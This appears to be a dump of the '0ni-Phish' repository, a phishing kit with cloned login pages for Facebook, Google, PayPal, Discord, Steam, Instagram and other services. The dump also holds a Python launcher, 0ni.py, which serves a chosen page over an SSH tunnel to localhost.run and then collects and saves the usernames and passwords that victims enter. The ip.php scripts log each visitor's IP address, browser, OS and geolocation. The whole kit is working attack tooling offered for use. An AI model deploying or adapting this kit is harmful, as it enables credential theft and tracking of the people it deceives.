├── logs └── error.log ├── pages ├── discord │ ├── fav.ico │ ├── qr.png │ ├── banner.png │ ├── index.php │ ├── 6c6374bad0b0b6d204d8d6dc4a18d820.woff │ ├── e8acd7d9bf6207f99350ca9f9e23b168.woff │ ├── login.php │ ├── ip.php │ ├── LICENSE │ └── script.js ├── Steam │ ├── index.php │ ├── login.php │ ├── ip.php │ └── login.html ├── discord_en │ ├── qr.png │ ├── fav.ico │ ├── banner.png │ ├── index.php │ ├── 6c6374bad0b0b6d204d8d6dc4a18d820.woff │ ├── e8acd7d9bf6207f99350ca9f9e23b168.woff │ ├── login.php │ ├── ip.php │ ├── LICENSE │ └── script.js ├── Github │ ├── index.php │ ├── login.php │ └── ip.php ├── Google │ ├── index.php │ ├── process.php │ └── ip.php ├── Steam_en │ ├── index.php │ ├── login.php │ ├── ip.php │ └── login.html ├── Twitter │ ├── index.php │ ├── login.php │ └── ip.php ├── Twitter_en │ ├── index.php │ ├── login.php │ └── ip.php ├── paypal │ ├── index.php │ ├── login.php │ └── ip.php ├── Netflix │ ├── index.php │ ├── login.php │ └── ip.php ├── instagram │ ├── favicon.png │ ├── index.php │ ├── home-phones.png │ ├── screenshot1.jpg │ ├── screenshot2.jpg │ ├── screenshot3.jpg │ ├── screenshot4.jpg │ ├── home-phones@2x.png │ ├── badge_ios_english-en.png │ ├── badge_android_english-en.png │ ├── sprite_core_32f0a4f27407.png │ ├── sprite_core_2x_bcd90c1d4868.png │ ├── login.php │ └── ip.php ├── roblox_en │ ├── index.php │ ├── login.php │ ├── ip.php │ └── login.html ├── roblox_es │ ├── index.php │ ├── login.php │ ├── ip.php │ └── login.html ├── Facebook │ ├── hsts-pixel.gif │ ├── index.php │ ├── login.php │ ├── ip.php │ ├── LICENSE │ └── logo.svg └── Facebook_en │ ├── hsts-pixel.gif │ ├── index.php │ ├── login.php │ ├── ip.php │ ├── LICENSE │ └── logo.svg ├── README.md ├── 0ni.py └── LICENSE /logs/error.log: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /pages/discord/fav.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/discord/fav.ico -------------------------------------------------------------------------------- /pages/discord/qr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/discord/qr.png -------------------------------------------------------------------------------- /pages/Steam/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /pages/discord_en/qr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/discord_en/qr.png -------------------------------------------------------------------------------- /pages/Github/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /pages/Google/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /pages/Steam_en/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /pages/Twitter/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /pages/Twitter_en/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /pages/discord/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/discord/banner.png -------------------------------------------------------------------------------- /pages/discord/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /pages/discord_en/fav.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/discord_en/fav.ico -------------------------------------------------------------------------------- /pages/paypal/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /pages/Netflix/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /pages/discord_en/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/discord_en/banner.png -------------------------------------------------------------------------------- /pages/discord_en/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /pages/instagram/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/instagram/favicon.png -------------------------------------------------------------------------------- /pages/instagram/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /pages/roblox_en/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /pages/roblox_es/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /pages/Facebook/hsts-pixel.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/Facebook/hsts-pixel.gif -------------------------------------------------------------------------------- /pages/instagram/home-phones.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/instagram/home-phones.png -------------------------------------------------------------------------------- /pages/instagram/screenshot1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/instagram/screenshot1.jpg -------------------------------------------------------------------------------- /pages/instagram/screenshot2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/instagram/screenshot2.jpg -------------------------------------------------------------------------------- /pages/instagram/screenshot3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/instagram/screenshot3.jpg -------------------------------------------------------------------------------- /pages/instagram/screenshot4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/instagram/screenshot4.jpg -------------------------------------------------------------------------------- /pages/Facebook_en/hsts-pixel.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/Facebook_en/hsts-pixel.gif -------------------------------------------------------------------------------- /pages/instagram/home-phones@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/instagram/home-phones@2x.png -------------------------------------------------------------------------------- /pages/instagram/badge_ios_english-en.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/instagram/badge_ios_english-en.png -------------------------------------------------------------------------------- /pages/instagram/badge_android_english-en.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/instagram/badge_android_english-en.png -------------------------------------------------------------------------------- /pages/instagram/sprite_core_32f0a4f27407.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/instagram/sprite_core_32f0a4f27407.png -------------------------------------------------------------------------------- /pages/instagram/sprite_core_2x_bcd90c1d4868.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/instagram/sprite_core_2x_bcd90c1d4868.png -------------------------------------------------------------------------------- /pages/discord/6c6374bad0b0b6d204d8d6dc4a18d820.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/discord/6c6374bad0b0b6d204d8d6dc4a18d820.woff -------------------------------------------------------------------------------- /pages/discord/e8acd7d9bf6207f99350ca9f9e23b168.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/discord/e8acd7d9bf6207f99350ca9f9e23b168.woff -------------------------------------------------------------------------------- /pages/discord_en/6c6374bad0b0b6d204d8d6dc4a18d820.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/discord_en/6c6374bad0b0b6d204d8d6dc4a18d820.woff -------------------------------------------------------------------------------- /pages/discord_en/e8acd7d9bf6207f99350ca9f9e23b168.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Euronymou5/0ni-Phish/HEAD/pages/discord_en/e8acd7d9bf6207f99350ca9f9e23b168.woff -------------------------------------------------------------------------------- /pages/discord/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /pages/Facebook/index.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /pages/Facebook_en/index.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /pages/Netflix/login.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /pages/Github/login.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /pages/discord_en/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /pages/instagram/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /pages/Twitter/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /pages/Twitter_en/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /pages/roblox_es/login.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /pages/Facebook/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /pages/Facebook_en/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /pages/paypal/login.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /pages/Steam/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /pages/roblox_en/login.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /pages/Steam_en/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /pages/Google/ip.php: -------------------------------------------------------------------------------- 1 | FBWordmark_Hex-RGB-1024 2 | -------------------------------------------------------------------------------- /pages/Facebook_en/logo.svg: -------------------------------------------------------------------------------- 1 | FBWordmark_Hex-RGB-1024 2 | -------------------------------------------------------------------------------- /pages/roblox_en/ip.php: -------------------------------------------------------------------------------- 1 | 'Windows 10', 33 | '/windows nt 6.3/i' => 'Windows 8.1', 34 | '/windows nt 6.2/i' => 'Windows 8', 35 | '/windows nt 6.1/i' => 'Windows 7', 36 | '/windows nt 6.0/i' => 'Windows Vista', 37 | '/windows nt 5.2/i' => 'Windows Server 2003/XP x64', 38 | '/windows nt 5.1/i' => 'Windows XP', 39 | '/windows xp/i' => 'Windows XP', 40 | '/windows nt 5.0/i' => 'Windows 2000', 41 | '/windows me/i' => 'Windows ME', 42 | '/win98/i' => 'Windows 98', 43 | '/win95/i' => 'Windows 95', 44 | '/win16/i' => 'Windows 3.11', 45 | '/macintosh|mac os x/i' => 'Mac OS X', 46 | '/mac_powerpc/i' => 'Mac OS 9', 47 | '/linux/i' => 'Linux', 48 | '/ubuntu/i' => 'Ubuntu', 49 | '/iphone/i' => 'iPhone', 50 | '/ipod/i' => 'iPod', 51 | '/ipad/i' => 'iPad', 52 | '/android/i' => 'Android', 53 | '/blackberry/i' => 'BlackBerry', 54 | '/webos/i' => 'Mobile' 55 | ); 56 | 57 | foreach ($os_array as $regex => $value) 58 | if (preg_match($regex, $user_agent)) 59 | $os_platform = $value; 60 | 61 | return $os_platform; 62 | } 63 | 64 | function getBrowser() { 65 | global $user_agent; 66 | $browser = "Unknown Browser"; 67 | $browser_array = array( 68 | '/msie/i' => 'Internet Explorer', 69 | '/firefox/i' => 'Firefox', 70 | '/safari/i' => 'Safari', 71 | '/chrome/i' => 'Chrome', 72 | '/edge/i' => 'Edge', 73 | '/opera/i' => 'Opera', 74 | '/netscape/i' => 'Netscape', 75 | '/maxthon/i' => 'Maxthon', 76 | '/konqueror/i' => 'Konqueror', 77 | '/mobile/i' => 'Handheld Browser' 78 | ); 79 | 80 | foreach ($browser_array as $regex => $value) 81 | if (preg_match($regex, $user_agent)) 82 | $browser = $value; 83 | 84 | return $browser; 85 | } 86 | 87 | 88 | $user_os = getOS(); 89 | $user_browser = getBrowser(); 90 | 91 | $PublicIP = get_client_ip(); 92 | $localHost = "127.0.0.1"; 93 | 94 | if (strpos($PublicIP, ',') !== false) { 95 | $PublicIP = explode(",", $PublicIP)[0]; 96 | } 97 | 98 | $file = 'ip.txt'; 99 | $ip = "IP : ".$PublicIP; 100 | $uaget = "User Agent : ".$user_agent; 101 | $bsr = "Browser : ".$user_browser; 102 | $uos = "User OS : ".$user_os; 103 | $ust= explode(" ", $user_agent); 104 | $vr= $ust[3]; 105 | $ver=str_replace(")", "", $vr); 106 | $version = "Version : ".$ver; 107 | if (strpos($PublicIP, $localHost) !== false) { 108 | $details = '{ 109 | "success": false 110 | }'; 111 | } 112 | else { 113 | $details = file_get_contents("http://ipwhois.app/json/$PublicIP"); 114 | } 115 | $details = json_decode($details, true); 116 | $success = $details['success']; 117 | $fp = fopen($file, 'a'); 118 | 119 | if ($success==false) { 120 | fwrite($fp, $ip."\n"); 121 | fwrite($fp, $uos."\n"); 122 | fwrite($fp, $version."\n"); 123 | fwrite($fp, $bsr."\n"); 124 | fclose($fp); 125 | } else if ($success==true) { 126 | $country = $details['country']; 127 | $city = $details['city']; 128 | $continent= $details['continent']; 129 | $tp = $details['type']; 130 | $cn = $details['country_phone']; 131 | $is = $details['isp']; 132 | $latitude = $details['latitude']; 133 | $longitude= $details['longitude']; 134 | $crn = $details['currency']; 135 | $type = "IP Type : ".$tp; 136 | $comma = ", "; 137 | $location = "Location : ".$city.$comma.$country.$comma.$continent; 138 | $geolocation= "GeoLocation(lat, lon): ".$latitude.$comma.$longitude; 139 | $isp = "ISP : ".$is; 140 | $currency = "Currency : ".$crn; 141 | fwrite($fp, $ip."\n"); 142 | fwrite($fp, $type."\n"); 143 | fwrite($fp, $uos."\n"); 144 | fwrite($fp, $uaget."\n"); 145 | fwrite($fp, $version."\n"); 146 | fwrite($fp, $bsr."\n"); 147 | fwrite($fp, $location."\n"); 148 | fwrite($fp, $geolocation."\n"); 149 | fwrite($fp, $currency."\n"); 150 | fclose($fp); 151 | } else { 152 | $status = "Status : ".$success; 153 | fwrite($fp, $status."\n"); 154 | fwrite($fp, $uaget."\n"); 155 | fclose($fp); 156 | } 157 | ?> 158 | -------------------------------------------------------------------------------- /pages/roblox_es/ip.php: -------------------------------------------------------------------------------- 1 | 'Windows 10', 33 | '/windows nt 6.3/i' => 'Windows 8.1', 34 | '/windows nt 6.2/i' => 'Windows 8', 35 | '/windows nt 6.1/i' => 'Windows 7', 36 | '/windows nt 6.0/i' => 'Windows Vista', 37 | '/windows nt 5.2/i' => 'Windows Server 2003/XP x64', 38 | '/windows nt 5.1/i' => 'Windows XP', 39 | '/windows xp/i' => 'Windows XP', 40 | '/windows nt 5.0/i' => 'Windows 2000', 41 | '/windows me/i' => 'Windows ME', 42 | '/win98/i' => 'Windows 98', 43 | '/win95/i' => 'Windows 95', 44 | '/win16/i' => 'Windows 3.11', 45 | '/macintosh|mac os x/i' => 'Mac OS X', 46 | '/mac_powerpc/i' => 'Mac OS 9', 47 | '/linux/i' => 'Linux', 48 | '/ubuntu/i' => 'Ubuntu', 49 | '/iphone/i' => 'iPhone', 50 | '/ipod/i' => 'iPod', 51 | '/ipad/i' => 'iPad', 52 | '/android/i' => 'Android', 53 | '/blackberry/i' => 'BlackBerry', 54 | '/webos/i' => 'Mobile' 55 | ); 56 | 57 | foreach ($os_array as $regex => $value) 58 | if (preg_match($regex, $user_agent)) 59 | $os_platform = $value; 60 | 61 | return $os_platform; 62 | } 63 | 64 | function getBrowser() { 65 | global $user_agent; 66 | $browser = "Unknown Browser"; 67 | $browser_array = array( 68 | '/msie/i' => 'Internet Explorer', 69 | '/firefox/i' => 'Firefox', 70 | '/safari/i' => 'Safari', 71 | '/chrome/i' => 'Chrome', 72 | '/edge/i' => 'Edge', 73 | '/opera/i' => 'Opera', 74 | '/netscape/i' => 'Netscape', 75 | '/maxthon/i' => 'Maxthon', 76 | '/konqueror/i' => 'Konqueror', 77 | '/mobile/i' => 'Handheld Browser' 78 | ); 79 | 80 | foreach ($browser_array as $regex => $value) 81 | if (preg_match($regex, $user_agent)) 82 | $browser = $value; 83 | 84 | return $browser; 85 | } 86 | 87 | 88 | $user_os = getOS(); 89 | $user_browser = getBrowser(); 90 | 91 | $PublicIP = get_client_ip(); 92 | $localHost = "127.0.0.1"; 93 | 94 | if (strpos($PublicIP, ',') !== false) { 95 | $PublicIP = explode(",", $PublicIP)[0]; 96 | } 97 | 98 | $file = 'ip.txt'; 99 | $ip = "IP : ".$PublicIP; 100 | $uaget = "User Agent : ".$user_agent; 101 | $bsr = "Navegador : ".$user_browser; 102 | $uos = "OS : ".$user_os; 103 | $ust= explode(" ", $user_agent); 104 | $vr= $ust[3]; 105 | $ver=str_replace(")", "", $vr); 106 | $version = "Version : ".$ver; 107 | if (strpos($PublicIP, $localHost) !== false) { 108 | $details = '{ 109 | "success": false 110 | }'; 111 | } 112 | else { 113 | $details = file_get_contents("http://ipwhois.app/json/$PublicIP"); 114 | } 115 | $details = json_decode($details, true); 116 | $success = $details['success']; 117 | $fp = fopen($file, 'a'); 118 | 119 | if ($success==false) { 120 | fwrite($fp, $ip."\n"); 121 | fwrite($fp, $uos."\n"); 122 | fwrite($fp, $version."\n"); 123 | fwrite($fp, $bsr."\n"); 124 | fclose($fp); 125 | } else if ($success==true) { 126 | $country = $details['country']; 127 | $city = $details['city']; 128 | $continent= $details['continent']; 129 | $tp = $details['type']; 130 | $cn = $details['country_phone']; 131 | $is = $details['isp']; 132 | $latitude = $details['latitude']; 133 | $longitude= $details['longitude']; 134 | $crn = $details['currency']; 135 | $type = "Tipo de IP : ".$tp; 136 | $comma = ", "; 137 | $location = "Ubicacion : ".$city.$comma.$country.$comma.$continent; 138 | $geolocation= "GeoLocation(lat, lon): ".$latitude.$comma.$longitude; 139 | $isp = "ISP : ".$is; 140 | $currency = "Moneda : ".$crn; 141 | fwrite($fp, $ip."\n"); 142 | fwrite($fp, $type."\n"); 143 | fwrite($fp, $uos."\n"); 144 | fwrite($fp, $uaget."\n"); 145 | fwrite($fp, $version."\n"); 146 | fwrite($fp, $bsr."\n"); 147 | fwrite($fp, $location."\n"); 148 | fwrite($fp, $geolocation."\n"); 149 | fwrite($fp, $currency."\n"); 150 | fclose($fp); 151 | } else { 152 | $status = "Status : ".$success; 153 | fwrite($fp, $status."\n"); 154 | fwrite($fp, $uaget."\n"); 155 | fclose($fp); 156 | } 157 | ?> 158 | -------------------------------------------------------------------------------- /0ni.py: -------------------------------------------------------------------------------- 1 | # 0ni-Phish 2 | # By: Euronymou5 3 | # https://twitter.com/Euronymou51 4 | # https://github.com/Euronymou5 5 | 6 | import os 7 | import time 8 | from colorama import Fore 9 | from re import search 10 | from os.path import isfile 11 | from subprocess import DEVNULL, PIPE, Popen, STDOUT 12 | 13 | global site 14 | 15 | def cat(file): 16 | if isfile(file): 17 | with open(file, "r") as filedata: 18 | return filedata.read() 19 | return "" 20 | 21 | error_file = "logs/error.log" 22 | 23 | def append(text, filename): 24 | with open(filename, "a") as file: 25 | file.write(str(text)+"\n") 26 | 27 | def grep(regex, target): 28 | if isfile(target): 29 | content = cat(target) 30 | else: 31 | content = target 32 | results = search(regex, content) 33 | if results is not None: 34 | return results.group(1) 35 | return "" 36 | 37 | def bgtask(command, stdout=PIPE, stderr=DEVNULL, cwd="./"): 38 | try: 39 | return Popen(command, shell=True, stdout=stdout, stderr=stderr, cwd=cwd) 40 | except Exception as e: 41 | append(e, error_file) 42 | 43 | cf_file = "logs/lh.log" 44 | cf_log = open(cf_file, 'w') 45 | 46 | def setup(site): 47 | print('\n[~] Iniciando servidor php...') 48 | print('[~] Puerto: 8080') 49 | os.system(f"php -S localhost:8080 -t pages/{site} > /dev/null 2>&1 & ") 50 | time.sleep(2) 51 | print('\n[~] Servidor php: ✔️') 52 | print('\n[~] Creando links...') 53 | time.sleep(2) 54 | bgtask("ssh -R 80:localhost:8080 localhost.run -T -n", stdout=cf_log, stderr=cf_log) 55 | cf_success = False 56 | for i in range(10): 57 | cf_url = grep("(https://[-0-9a-z.]*.lhr.life)", cf_file) 58 | if cf_url != "": 59 | cf_success = True 60 | break 61 | time.sleep(1) 62 | print(f'\n[~] Link: {cf_url}') 63 | print('\n[~] Esperando datos...') 64 | while True: 65 | if os.path.isfile(f'pages/{site}/usuarios.txt'): 66 | print('\n\033[31m[!] Usuarios encontrados!') 67 | print('\033[92m') 68 | os.system(f"cat pages/{site}/usuarios.txt") 69 | os.system(f"cat pages/{site}/usuarios.txt >> pages/{site}/usuarios_guardados.txt") 70 | os.system(f"rm -rf pages/{site}/usuarios.txt") 71 | print('\n\033[34m[~] Usuarios guardados en: usuarios_guardados.txt') 72 | if os.path.isfile(f'pages/{site}/ip.txt'): 73 | print('\n\033[31m[!] IP encontrados!') 74 | print('\033[31m') 75 | os.system(f"cat pages/{site}/ip.txt") 76 | os.system(f"cat pages/{site}/ip.txt >> pages/{site}/ip_guardados.txt") 77 | os.system(f"rm -rf pages/{site}/ip.txt") 78 | print('') 79 | print('\n\033[34m[~] IP guardados en: ip_guardados.txt') 80 | 81 | def menu(): 82 | os.system("killall php") 83 | os.system("clear") 84 | print("""\033[92m 85 | ██████ ███ ██ ██ ██████ ██ ██ ██ ███████ ██ ██ 86 | ██ ████ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ 87 | ██ ██ ██ ██ ██ ██ ██ ██████ ███████ ██ ███████ ███████ 88 | ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ 89 | ██████ ██ ████ ██ ██ ██ ██ ██ ███████ ██ ██ 90 | v3.0 91 | |---[ By: Euronymou5 ]---| 92 | """) 93 | print(""" 94 | [1] Facebook [2] Google gmail 95 | 96 | [3] Twitter [4] Netflix 97 | 98 | [5] Github [6] Discord 99 | 100 | [7] Paypal [8] Roblox 101 | 102 | [9] Steam [10] Instagram 103 | """) 104 | inl = int(input('\n>> ')) 105 | if inl == 1: 106 | print('\n[~] Selecciona el lenguaje que deseas usar:') 107 | print('\n[1] Español') 108 | print('\n[2] Ingles') 109 | a = int(input('\n>> ')) 110 | if a == 1: 111 | site = "Facebook" 112 | setup(site) 113 | elif a == 2: 114 | site = "Facebook_en" 115 | setup(site) 116 | else: 117 | menu() 118 | elif inl == 2: 119 | site = "Google" 120 | setup(site) 121 | elif inl == 3: 122 | print('\n[~] Selecciona el lenguaje que deseas usar:') 123 | print('\n[1] Español') 124 | print('\n[2] Ingles') 125 | a = int(input('\n>> ')) 126 | if a == 1: 127 | site = "Twitter" 128 | setup(site) 129 | elif a == 2: 130 | site = "Twitter_en" 131 | setup(site) 132 | else: 133 | menu() 134 | elif inl == 4: 135 | site = "Netflix" 136 | setup(site) 137 | elif inl == 5: 138 | site = "Github" 139 | setup(site) 140 | elif inl == 6: 141 | print('\n[~] Selecciona el lenguaje que deseas usar:') 142 | print('\n[1] Español') 143 | print('\n[2] Ingles') 144 | a = int(input('\n>> ')) 145 | if a == 1: 146 | site = "discord" 147 | setup(site) 148 | elif a == 2: 149 | site = "discord_en" 150 | setup(site) 151 | else: 152 | menu() 153 | elif inl == 7: 154 | site = "paypal" 155 | setup(site) 156 | elif inl == 8: 157 | print('\n[~] Selecciona el lenguaje que deseas usar:') 158 | print('\n[1] Español') 159 | print('\n[2] Ingles') 160 | a = int(input('\n>> ')) 161 | if a == 1: 162 | site = "roblox_es" 163 | setup(site) 164 | elif a == 2: 165 | site = "roblox_en" 166 | setup(site) 167 | else: 168 | menu() 169 | elif inl == 9: 170 | print('\n[~] Selecciona el lenguaje que deseas usar:') 171 | print('\n[1] Español') 172 | print('\n[2] Ingles') 173 | a = int(input('\n>> ')) 174 | if a == 1: 175 | site = "Steam" 176 | setup(site) 177 | elif a == 2: 178 | site = "Steam_en" 179 | setup(site) 180 | else: 181 | menu() 182 | elif inl == 10: 183 | site = "instagram" 184 | setup(site) 185 | else: 186 | print(f'{Fore.RED}\n[!] Error opcion invalida!') 187 | time.sleep(2) 188 | menu() 189 | 190 | 191 | def config(): 192 | home = os.getenv("HOME") 193 | if os.path.isfile(f'{home}/.ssh/id_rsa'): 194 | menu() 195 | else: 196 | print('\033[31m\n[!] Key de localhost.run no encontrada.') 197 | print('\033[32m\n[~] Generando key...') 198 | time.sleep(2) 199 | os.system(f"ssh-keygen -N '' -t rsa -f {home}/.ssh/id_rsa") 200 | time.sleep(2) 201 | menu() 202 | 203 | if __name__ == "__main__": 204 | config() 205 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Mozilla Public License Version 2.0 2 | ================================== 3 | 4 | 1. Definitions 5 | -------------- 6 | 7 | 1.1. "Contributor" 8 | means each individual or legal entity that creates, contributes to 9 | the creation of, or owns Covered Software. 10 | 11 | 1.2. "Contributor Version" 12 | means the combination of the Contributions of others (if any) used 13 | by a Contributor and that particular Contributor's Contribution. 14 | 15 | 1.3. "Contribution" 16 | means Covered Software of a particular Contributor. 17 | 18 | 1.4. "Covered Software" 19 | means Source Code Form to which the initial Contributor has attached 20 | the notice in Exhibit A, the Executable Form of such Source Code 21 | Form, and Modifications of such Source Code Form, in each case 22 | including portions thereof. 23 | 24 | 1.5. "Incompatible With Secondary Licenses" 25 | means 26 | 27 | (a) that the initial Contributor has attached the notice described 28 | in Exhibit B to the Covered Software; or 29 | 30 | (b) that the Covered Software was made available under the terms of 31 | version 1.1 or earlier of the License, but not also under the 32 | terms of a Secondary License. 33 | 34 | 1.6. "Executable Form" 35 | means any form of the work other than Source Code Form. 36 | 37 | 1.7. "Larger Work" 38 | means a work that combines Covered Software with other material, in 39 | a separate file or files, that is not Covered Software. 40 | 41 | 1.8. "License" 42 | means this document. 43 | 44 | 1.9. "Licensable" 45 | means having the right to grant, to the maximum extent possible, 46 | whether at the time of the initial grant or subsequently, any and 47 | all of the rights conveyed by this License. 48 | 49 | 1.10. "Modifications" 50 | means any of the following: 51 | 52 | (a) any file in Source Code Form that results from an addition to, 53 | deletion from, or modification of the contents of Covered 54 | Software; or 55 | 56 | (b) any new file in Source Code Form that contains any Covered 57 | Software. 58 | 59 | 1.11. "Patent Claims" of a Contributor 60 | means any patent claim(s), including without limitation, method, 61 | process, and apparatus claims, in any patent Licensable by such 62 | Contributor that would be infringed, but for the grant of the 63 | License, by the making, using, selling, offering for sale, having 64 | made, import, or transfer of either its Contributions or its 65 | Contributor Version. 66 | 67 | 1.12. "Secondary License" 68 | means either the GNU General Public License, Version 2.0, the GNU 69 | Lesser General Public License, Version 2.1, the GNU Affero General 70 | Public License, Version 3.0, or any later versions of those 71 | licenses. 72 | 73 | 1.13. "Source Code Form" 74 | means the form of the work preferred for making modifications. 75 | 76 | 1.14. "You" (or "Your") 77 | means an individual or a legal entity exercising rights under this 78 | License. For legal entities, "You" includes any entity that 79 | controls, is controlled by, or is under common control with You. For 80 | purposes of this definition, "control" means (a) the power, direct 81 | or indirect, to cause the direction or management of such entity, 82 | whether by contract or otherwise, or (b) ownership of more than 83 | fifty percent (50%) of the outstanding shares or beneficial 84 | ownership of such entity. 85 | 86 | 2. License Grants and Conditions 87 | -------------------------------- 88 | 89 | 2.1. Grants 90 | 91 | Each Contributor hereby grants You a world-wide, royalty-free, 92 | non-exclusive license: 93 | 94 | (a) under intellectual property rights (other than patent or trademark) 95 | Licensable by such Contributor to use, reproduce, make available, 96 | modify, display, perform, distribute, and otherwise exploit its 97 | Contributions, either on an unmodified basis, with Modifications, or 98 | as part of a Larger Work; and 99 | 100 | (b) under Patent Claims of such Contributor to make, use, sell, offer 101 | for sale, have made, import, and otherwise transfer either its 102 | Contributions or its Contributor Version. 103 | 104 | 2.2. Effective Date 105 | 106 | The licenses granted in Section 2.1 with respect to any Contribution 107 | become effective for each Contribution on the date the Contributor first 108 | distributes such Contribution. 109 | 110 | 2.3. Limitations on Grant Scope 111 | 112 | The licenses granted in this Section 2 are the only rights granted under 113 | this License. No additional rights or licenses will be implied from the 114 | distribution or licensing of Covered Software under this License. 115 | Notwithstanding Section 2.1(b) above, no patent license is granted by a 116 | Contributor: 117 | 118 | (a) for any code that a Contributor has removed from Covered Software; 119 | or 120 | 121 | (b) for infringements caused by: (i) Your and any other third party's 122 | modifications of Covered Software, or (ii) the combination of its 123 | Contributions with other software (except as part of its Contributor 124 | Version); or 125 | 126 | (c) under Patent Claims infringed by Covered Software in the absence of 127 | its Contributions. 128 | 129 | This License does not grant any rights in the trademarks, service marks, 130 | or logos of any Contributor (except as may be necessary to comply with 131 | the notice requirements in Section 3.4). 132 | 133 | 2.4. Subsequent Licenses 134 | 135 | No Contributor makes additional grants as a result of Your choice to 136 | distribute the Covered Software under a subsequent version of this 137 | License (see Section 10.2) or under the terms of a Secondary License (if 138 | permitted under the terms of Section 3.3). 139 | 140 | 2.5. Representation 141 | 142 | Each Contributor represents that the Contributor believes its 143 | Contributions are its original creation(s) or it has sufficient rights 144 | to grant the rights to its Contributions conveyed by this License. 145 | 146 | 2.6. Fair Use 147 | 148 | This License is not intended to limit any rights You have under 149 | applicable copyright doctrines of fair use, fair dealing, or other 150 | equivalents. 151 | 152 | 2.7. Conditions 153 | 154 | Sections 3.1, 3.2, 3.3, and 3.4 are conditions of the licenses granted 155 | in Section 2.1. 156 | 157 | 3. Responsibilities 158 | ------------------- 159 | 160 | 3.1. Distribution of Source Form 161 | 162 | All distribution of Covered Software in Source Code Form, including any 163 | Modifications that You create or to which You contribute, must be under 164 | the terms of this License. You must inform recipients that the Source 165 | Code Form of the Covered Software is governed by the terms of this 166 | License, and how they can obtain a copy of this License. You may not 167 | attempt to alter or restrict the recipients' rights in the Source Code 168 | Form. 169 | 170 | 3.2. Distribution of Executable Form 171 | 172 | If You distribute Covered Software in Executable Form then: 173 | 174 | (a) such Covered Software must also be made available in Source Code 175 | Form, as described in Section 3.1, and You must 